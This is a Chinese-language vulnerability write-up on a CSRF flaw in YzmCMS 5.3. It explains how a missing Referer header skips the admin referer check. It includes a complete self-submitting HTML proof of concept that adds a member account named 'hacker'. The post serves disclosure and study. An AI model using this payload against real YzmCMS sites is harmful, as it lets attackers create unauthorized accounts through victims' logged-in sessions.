YzmCMS内容管理系统存在csrf漏洞
文章作者:maple
版权申明:本博客所有文章除特别声明外,转载请注明来自maple
版本5.3
data:image/s3,"s3://crabby-images/1962c/1962ca32d9391f629a1329a655c39a298a1f1ca2" alt=""
在application\admin\controller\common.class.php文件中,我们看一下__construct魔术方法。
data:image/s3,"s3://crabby-images/3c43f/3c43f457adb3f3bab2874252a8e307ac8823849a" alt=""
调用了check_referer魔术方法,我们跟进。
data:image/s3,"s3://crabby-images/3df5f/3df5fa7ed67e8bb69d0a9d515b4a4168573a462b" alt=""
可以看到,判断了HTTP_REFERER,但是如果HTTP_REFERER不存在,则不会进入到该分支。
在构造POC的html中,我们只需要加一句meta标签即可将发出去的请求不会携带REFERER。
编写“添加会员”来进行测试。
Payload
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="referrer" content="never">
<title>Document</title>
</head>
<body>
<form action="http://127.0.0.1/yzmcms/member/member/add.html" method="post">
<input type="hidden" name="username" value="hacker">
<input type="hidden" name="password" value="hacker">
<input type="hidden" name="nickname" value="hacker">
<input type="hidden" name="email" value="hacker@hacker.com">
<input type="hidden" name="groupid" value="1">
<input type="hidden" name="point" value="0">
<input type="hidden" name="overduedate" value="">
<input type="hidden" name="dosubmit" value="1">
</form>
<script>
let oForm = document.querySelector('form');
oForm.submit();
</script>
</body>
</html>
data:image/s3,"s3://crabby-images/2c2ca/2c2ca0b186a4e8c175b729b96a7022071afcd15c" alt=""
点开csrf.html
data:image/s3,"s3://crabby-images/7b9f3/7b9f3d2365a16d5baf4bc5b82c157eee9da4717c" alt=""
成功添加用户
data:image/s3,"s3://crabby-images/63092/6309254d1134c39d11f320b9b725a09975b6182e" alt=""
本文迁移自知识星球“火线Zone”